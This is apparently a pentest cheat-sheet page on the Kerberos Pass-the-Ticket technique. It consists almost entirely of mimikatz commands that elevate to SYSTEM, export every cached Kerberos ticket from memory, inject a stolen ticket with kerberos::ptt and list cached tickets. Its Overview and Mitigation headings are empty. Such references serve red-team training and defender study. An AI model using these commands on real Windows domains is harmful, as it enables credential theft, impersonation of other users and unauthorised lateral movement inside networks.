Pass the Ticket
Overview
Exploitation
# Start mimikatz and get SYSTEM
mimikatz.exe
privilege::debug
token::elevate
# Export all .kirbi tickets to current directory
sekurlsa::tickets /export
# PTT with mimikatz
kerberos::ptt <ticket>
# List cached tickets
klistMitigation:
Last updated